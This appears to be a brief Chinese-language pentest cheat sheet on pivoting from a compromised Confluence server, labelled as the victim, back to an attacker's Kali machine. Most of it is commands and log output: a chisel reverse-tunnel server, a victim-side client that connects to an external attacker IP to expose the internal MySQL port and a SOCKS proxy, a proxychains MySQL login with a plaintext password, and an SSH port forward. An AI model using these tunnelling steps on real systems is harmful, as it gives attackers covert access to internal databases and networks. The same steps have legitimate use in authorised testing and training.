攻擊機 Kali chisel server -p 443 --reverse
受害機 confluence ./chisel client 35.236.161.97:443 R:11111:127.0.0.1:3307 將受害機的mysql 3307端口隧道回kali本機的11111端口
mysql -u confluence confluence -P 11111 -pconfluence
受害機
./chisel client 35.236.161.97:443 R:socks
kali
[root@nginx-1 ~]# /usr/local/bin/chisel server -p 443 --reverse
2022/08/16 23:39:28 server: Reverse tunnelling enabled
2022/08/16 23:39:28 server: Fingerprint PgURFcj4bliA7sYHWosl/FOxA6yS14+f+lLDJqbA14Y=
2022/08/16 23:39:28 server: Listening on http://0.0.0.0:443
2022/08/16 23:40:33 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
kali
proxychains4 mysql -uroot -h 172.21.0.8 -P 3306 -p
ssh -C -f -N -g -L 0.0.0.0:8094:127.0.0.1:1080 qoo7972365@localhost
Comments